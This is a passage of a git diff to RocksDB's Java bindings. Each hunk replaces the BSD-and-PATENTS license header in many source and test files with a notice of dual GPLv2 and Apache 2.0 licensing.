+// (found in the LICENSE.Apache file in the root directory).

 package org.rocksdb;

diff --git a/java/src/main/java/org/rocksdb/util/BytewiseComparator.java b/java/src/main/java/org/rocksdb/util/BytewiseComparator.java
index 17337bfc855..18f73919da8 100644
--- a/java/src/main/java/org/rocksdb/util/BytewiseComparator.java
+++ b/java/src/main/java/org/rocksdb/util/BytewiseComparator.java
@@ -1,7 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 package org.rocksdb.util;

diff --git a/java/src/main/java/org/rocksdb/util/DirectBytewiseComparator.java b/java/src/main/java/org/rocksdb/util/DirectBytewiseComparator.java
index 170f0f42e47..9417544f7a1 100644
--- a/java/src/main/java/org/rocksdb/util/DirectBytewiseComparator.java
+++ b/java/src/main/java/org/rocksdb/util/DirectBytewiseComparator.java
@@ -1,7 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).

 package org.rocksdb.util;

diff --git a/java/src/main/java/org/rocksdb/util/ReverseBytewiseComparator.java b/java/src/main/java/org/rocksdb/util/ReverseBytewiseComparator.java
index beedc185d4b..7fbac2fd6b9 100644
--- a/java/src/main/java/org/rocksdb/util/ReverseBytewiseComparator.java
+++ b/java/src/main/java/org/rocksdb/util/ReverseBytewiseComparator.java
@@ -1,7 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).

 package org.rocksdb.util;

diff --git a/java/src/main/java/org/rocksdb/util/SizeUnit.java b/java/src/main/java/org/rocksdb/util/SizeUnit.java
index e66fc371cd5..0f717e8d454 100644
--- a/java/src/main/java/org/rocksdb/util/SizeUnit.java
+++ b/java/src/main/java/org/rocksdb/util/SizeUnit.java
@@ -1,7 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).

 package org.rocksdb.util;

diff --git a/java/src/test/java/org/rocksdb/AbstractComparatorTest.java b/java/src/test/java/org/rocksdb/AbstractComparatorTest.java
index db4b4d7d012..91a1e99942d 100644
--- a/java/src/test/java/org/rocksdb/AbstractComparatorTest.java
+++ b/java/src/test/java/org/rocksdb/AbstractComparatorTest.java
@@ -1,7 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 package org.rocksdb;

diff --git a/java/src/test/java/org/rocksdb/BackupEngineTest.java b/java/src/test/java/org/rocksdb/BackupEngineTest.java
index b50ddf49903..1caae5098ed 100644
--- a/java/src/test/java/org/rocksdb/BackupEngineTest.java
+++ b/java/src/test/java/org/rocksdb/BackupEngineTest.java
@@ -1,7 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).

 package org.rocksdb;

diff --git a/java/src/test/java/org/rocksdb/BackupableDBOptionsTest.java b/java/src/test/java/org/rocksdb/BackupableDBOptionsTest.java
index 597d9723ffd..c223014fd28 100644
--- a/java/src/test/java/org/rocksdb/BackupableDBOptionsTest.java
+++ b/java/src/test/java/org/rocksdb/BackupableDBOptionsTest.java
@@ -1,7 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).

 package org.rocksdb;

diff --git a/java/src/test/java/org/rocksdb/BlockBasedTableConfigTest.java b/java/src/test/java/org/rocksdb/BlockBasedTableConfigTest.java
index 94bcf7b042e..8edc8b89fd6 100644
--- a/java/src/test/java/org/rocksdb/BlockBasedTableConfigTest.java
+++ b/java/src/test/java/org/rocksdb/BlockBasedTableConfigTest.java
@@ -1,7 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).

 package org.rocksdb;

diff --git a/java/src/test/java/org/rocksdb/ClockCacheTest.java b/java/src/test/java/org/rocksdb/ClockCacheTest.java
index 5fc54df60e0..d1241ac75b8 100644
--- a/java/src/test/java/org/rocksdb/ClockCacheTest.java
+++ b/java/src/test/java/org/rocksdb/ClockCacheTest.java
@@ -1,7 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 package org.rocksdb;

diff --git a/java/src/test/java/org/rocksdb/ColumnFamilyOptionsTest.java b/java/src/test/java/org/rocksdb/ColumnFamilyOptionsTest.java
index f5438b39688..75749437b81 100644
--- a/java/src/test/java/org/rocksdb/ColumnFamilyOptionsTest.java
+++ b/java/src/test/java/org/rocksdb/ColumnFamilyOptionsTest.java
@@ -1,7 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).

 package org.rocksdb;

diff --git a/java/src/test/java/org/rocksdb/ColumnFamilyTest.java b/java/src/test/java/org/rocksdb/ColumnFamilyTest.java
index 3bf8cd22b3d..19fe332df97 100644
--- a/java/src/test/java/org/rocksdb/ColumnFamilyTest.java
+++ b/java/src/test/java/org/rocksdb/ColumnFamilyTest.java
@@ -1,7 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).

 package org.rocksdb;

diff --git a/java/src/test/java/org/rocksdb/CompactionOptionsFIFOTest.java b/java/src/test/java/org/rocksdb/CompactionOptionsFIFOTest.java
index 90db2727422..370a28e8196 100644
--- a/java/src/test/java/org/rocksdb/CompactionOptionsFIFOTest.java
+++ b/java/src/test/java/org/rocksdb/CompactionOptionsFIFOTest.java
@@ -1,7 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).

 package org.rocksdb;

diff --git a/java/src/test/java/org/rocksdb/CompactionOptionsUniversalTest.java b/java/src/test/java/org/rocksdb/CompactionOptionsUniversalTest.java
index 6bc6be544bf..5e2d195b6e5 100644
--- a/java/src/test/java/org/rocksdb/CompactionOptionsUniversalTest.java
+++ b/java/src/test/java/org/rocksdb/CompactionOptionsUniversalTest.java
@@ -1,7 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 package org.rocksdb;

diff --git a/java/src/test/java/org/rocksdb/CompactionPriorityTest.java b/java/src/test/java/org/rocksdb/CompactionPriorityTest.java
index a92991f39ff..b078e132f96 100644
--- a/java/src/test/java/org/rocksdb/CompactionPriorityTest.java
+++ b/java/src/test/java/org/rocksdb/CompactionPriorityTest.java
@@ -1,7 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).

 package org.rocksdb;

diff --git a/java/src/test/java/org/rocksdb/CompactionStopStyleTest.java b/java/src/test/java/org/rocksdb/CompactionStopStyleTest.java
index 41ebeb8d5d9..4c8a20950c8 100644
--- a/java/src/test/java/org/rocksdb/CompactionStopStyleTest.java
+++ b/java/src/test/java/org/rocksdb/CompactionStopStyleTest.java
@@ -1,7 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).

 package org.rocksdb;

diff --git a/java/src/test/java/org/rocksdb/ComparatorOptionsTest.java b/java/src/test/java/org/rocksdb/ComparatorOptionsTest.java
index fcdd09acbac..a45c7173c27 100644
--- a/java/src/test/java/org/rocksdb/ComparatorOptionsTest.java
+++ b/java/src/test/java/org/rocksdb/ComparatorOptionsTest.java
@@ -1,7 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).

 package org.rocksdb;

diff --git a/java/src/test/java/org/rocksdb/ComparatorTest.java b/java/src/test/java/org/rocksdb/ComparatorTest.java
index b3482184478..63dee7257d3 100644
--- a/java/src/test/java/org/rocksdb/ComparatorTest.java
+++ b/java/src/test/java/org/rocksdb/ComparatorTest.java
@@ -1,7 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 package org.rocksdb;

diff --git a/java/src/test/java/org/rocksdb/CompressionOptionsTest.java b/java/src/test/java/org/rocksdb/CompressionOptionsTest.java
index a49a70677cc..c49224ca36b 100644
--- a/java/src/test/java/org/rocksdb/CompressionOptionsTest.java
+++ b/java/src/test/java/org/rocksdb/CompressionOptionsTest.java
@@ -1,7 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).

 package org.rocksdb;

diff --git a/java/src/test/java/org/rocksdb/CompressionTypesTest.java b/java/src/test/java/org/rocksdb/CompressionTypesTest.java
index a3475b41e8e..e26cc0aca0f 100644
--- a/java/src/test/java/org/rocksdb/CompressionTypesTest.java
+++ b/java/src/test/java/org/rocksdb/CompressionTypesTest.java
@@ -1,7 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).

 package org.rocksdb;

diff --git a/java/src/test/java/org/rocksdb/DBOptionsTest.java b/java/src/test/java/org/rocksdb/DBOptionsTest.java
index ba3e9e41c97..11b7435d8a9 100644
--- a/java/src/test/java/org/rocksdb/DBOptionsTest.java
+++ b/java/src/test/java/org/rocksdb/DBOptionsTest.java
@@ -1,7 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).

 package org.rocksdb;

diff --git a/java/src/test/java/org/rocksdb/DirectComparatorTest.java b/java/src/test/java/org/rocksdb/DirectComparatorTest.java
index abdbeada9e6..9b593d05651 100644
--- a/java/src/test/java/org/rocksdb/DirectComparatorTest.java
+++ b/java/src/test/java/org/rocksdb/DirectComparatorTest.java
@@ -1,7 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 package org.rocksdb;

diff --git a/java/src/test/java/org/rocksdb/DirectSliceTest.java b/java/src/test/java/org/rocksdb/DirectSliceTest.java
index 5c3a978584e..48ae52afd66 100644
--- a/java/src/test/java/org/rocksdb/DirectSliceTest.java
+++ b/java/src/test/java/org/rocksdb/DirectSliceTest.java
@@ -1,7 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).

 package org.rocksdb;
 import org.junit.ClassRule;

diff --git a/java/src/test/java/org/rocksdb/EnvOptionsTest.java b/java/src/test/java/org/rocksdb/EnvOptionsTest.java
index 648f4eb324e..9933b1e1dbe 100644
--- a/java/src/test/java/org/rocksdb/EnvOptionsTest.java
+++ b/java/src/test/java/org/rocksdb/EnvOptionsTest.java
@@ -1,7 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).

 package org.rocksdb;

diff --git a/java/src/test/java/org/rocksdb/FilterTest.java b/java/src/test/java/org/rocksdb/FilterTest.java
index e5bb60fda4c..c6109639e32 100644
--- a/java/src/test/java/org/rocksdb/FilterTest.java
+++ b/java/src/test/java/org/rocksdb/FilterTest.java
@@ -1,7 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).

 package org.rocksdb;

diff --git a/java/src/test/java/org/rocksdb/FlushTest.java b/java/src/test/java/org/rocksdb/FlushTest.java
index f3530292ae1..46a5cdc6802 100644
--- a/java/src/test/java/org/rocksdb/FlushTest.java
+++ b/java/src/test/java/org/rocksdb/FlushTest.java
@@ -1,7 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
package org.rocksdb; import org.junit.ClassRule; diff --git a/java/src/test/java/org/rocksdb/IngestExternalFileOptionsTest.java b/java/src/test/java/org/rocksdb/IngestExternalFileOptionsTest.java index e7a50317ba5..83e0dd17af4 100644 --- a/java/src/test/java/org/rocksdb/IngestExternalFileOptionsTest.java +++ b/java/src/test/java/org/rocksdb/IngestExternalFileOptionsTest.java @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). package org.rocksdb; diff --git a/java/src/test/java/org/rocksdb/KeyMayExistTest.java b/java/src/test/java/org/rocksdb/KeyMayExistTest.java index b2f69c41d43..8092270eb2d 100644 --- a/java/src/test/java/org/rocksdb/KeyMayExistTest.java +++ b/java/src/test/java/org/rocksdb/KeyMayExistTest.java @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). package org.rocksdb; import org.junit.ClassRule; diff --git a/java/src/test/java/org/rocksdb/LRUCacheTest.java b/java/src/test/java/org/rocksdb/LRUCacheTest.java index e9d860baa6b..d2cd15b7e97 100644 --- a/java/src/test/java/org/rocksdb/LRUCacheTest.java +++ b/java/src/test/java/org/rocksdb/LRUCacheTest.java @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). package org.rocksdb; diff --git a/java/src/test/java/org/rocksdb/MemTableTest.java b/java/src/test/java/org/rocksdb/MemTableTest.java index bbd5e2055b3..59503d48181 100644 --- a/java/src/test/java/org/rocksdb/MemTableTest.java +++ b/java/src/test/java/org/rocksdb/MemTableTest.java @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). 

 package org.rocksdb;

diff --git a/java/src/test/java/org/rocksdb/MergeTest.java b/java/src/test/java/org/rocksdb/MergeTest.java
index dec01a16209..73b90869cf1 100644
--- a/java/src/test/java/org/rocksdb/MergeTest.java
+++ b/java/src/test/java/org/rocksdb/MergeTest.java
@@ -1,7 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).

 package org.rocksdb;

diff --git a/java/src/test/java/org/rocksdb/MixedOptionsTest.java b/java/src/test/java/org/rocksdb/MixedOptionsTest.java
index bbe29571974..ff68b1b00e3 100644
--- a/java/src/test/java/org/rocksdb/MixedOptionsTest.java
+++ b/java/src/test/java/org/rocksdb/MixedOptionsTest.java
@@ -1,7 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).

 package org.rocksdb;

diff --git a/java/src/test/java/org/rocksdb/MutableColumnFamilyOptionsTest.java b/java/src/test/java/org/rocksdb/MutableColumnFamilyOptionsTest.java
index eb7b3ebc36e..f631905e19f 100644
--- a/java/src/test/java/org/rocksdb/MutableColumnFamilyOptionsTest.java
+++ b/java/src/test/java/org/rocksdb/MutableColumnFamilyOptionsTest.java
@@ -1,7 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).

 package org.rocksdb;
 import org.junit.Test;
diff --git a/java/src/test/java/org/rocksdb/NativeLibraryLoaderTest.java b/java/src/test/java/org/rocksdb/NativeLibraryLoaderTest.java
index 186108ffb6b..ab60081a076 100644
--- a/java/src/test/java/org/rocksdb/NativeLibraryLoaderTest.java
+++ b/java/src/test/java/org/rocksdb/NativeLibraryLoaderTest.java
@@ -1,7 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).

 package org.rocksdb;
 import org.junit.Rule;
diff --git a/java/src/test/java/org/rocksdb/OptionsTest.java b/java/src/test/java/org/rocksdb/OptionsTest.java
index 71f6ee7dfb3..6afcab3300a 100644
--- a/java/src/test/java/org/rocksdb/OptionsTest.java
+++ b/java/src/test/java/org/rocksdb/OptionsTest.java
@@ -1,7 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).

 package org.rocksdb;

diff --git a/java/src/test/java/org/rocksdb/PlainTableConfigTest.java b/java/src/test/java/org/rocksdb/PlainTableConfigTest.java
index 05bd13863de..dcb6cc39f89 100644
--- a/java/src/test/java/org/rocksdb/PlainTableConfigTest.java
+++ b/java/src/test/java/org/rocksdb/PlainTableConfigTest.java
@@ -1,7 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).

 package org.rocksdb;

diff --git a/java/src/test/java/org/rocksdb/PlatformRandomHelper.java b/java/src/test/java/org/rocksdb/PlatformRandomHelper.java
index b437e7f97b9..80ea4d197f7 100644
--- a/java/src/test/java/org/rocksdb/PlatformRandomHelper.java
+++ b/java/src/test/java/org/rocksdb/PlatformRandomHelper.java
@@ -1,7 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).

 package org.rocksdb;

diff --git a/java/src/test/java/org/rocksdb/RateLimiterTest.java b/java/src/test/java/org/rocksdb/RateLimiterTest.java
index 96733d74b0a..27567e89d1d 100644
--- a/java/src/test/java/org/rocksdb/RateLimiterTest.java
+++ b/java/src/test/java/org/rocksdb/RateLimiterTest.java
@@ -1,7 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).

 package org.rocksdb;
 import org.junit.ClassRule;
diff --git a/java/src/test/java/org/rocksdb/ReadOnlyTest.java b/java/src/test/java/org/rocksdb/ReadOnlyTest.java
index d993c914848..6b4c7b25961 100644
--- a/java/src/test/java/org/rocksdb/ReadOnlyTest.java
+++ b/java/src/test/java/org/rocksdb/ReadOnlyTest.java
@@ -1,7 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).

 package org.rocksdb;
 import org.junit.ClassRule;
diff --git a/java/src/test/java/org/rocksdb/ReadOptionsTest.java b/java/src/test/java/org/rocksdb/ReadOptionsTest.java
index 13d795f55e1..da048c4431e 100644
--- a/java/src/test/java/org/rocksdb/ReadOptionsTest.java
+++ b/java/src/test/java/org/rocksdb/ReadOptionsTest.java
@@ -1,7 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).

 package org.rocksdb;

diff --git a/java/src/test/java/org/rocksdb/RocksDBExceptionTest.java b/java/src/test/java/org/rocksdb/RocksDBExceptionTest.java
index 162b62e55b8..d3bd4ece7f1 100644
--- a/java/src/test/java/org/rocksdb/RocksDBExceptionTest.java
+++ b/java/src/test/java/org/rocksdb/RocksDBExceptionTest.java
@@ -1,7 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).

 package org.rocksdb;

diff --git a/java/src/test/java/org/rocksdb/RocksDBTest.java b/java/src/test/java/org/rocksdb/RocksDBTest.java
index e9549747878..89894746d2c 100644
--- a/java/src/test/java/org/rocksdb/RocksDBTest.java
+++ b/java/src/test/java/org/rocksdb/RocksDBTest.java
@@ -1,7 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).

 package org.rocksdb;
 import org.junit.ClassRule;
diff --git a/java/src/test/java/org/rocksdb/RocksEnvTest.java b/java/src/test/java/org/rocksdb/RocksEnvTest.java
index d89570aad27..dfb79610738 100644
--- a/java/src/test/java/org/rocksdb/RocksEnvTest.java
+++ b/java/src/test/java/org/rocksdb/RocksEnvTest.java
@@ -1,7 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).

 package org.rocksdb;

diff --git a/java/src/test/java/org/rocksdb/RocksIteratorTest.java b/java/src/test/java/org/rocksdb/RocksIteratorTest.java
index 4471df9cce1..982dab4fc8f 100644
--- a/java/src/test/java/org/rocksdb/RocksIteratorTest.java
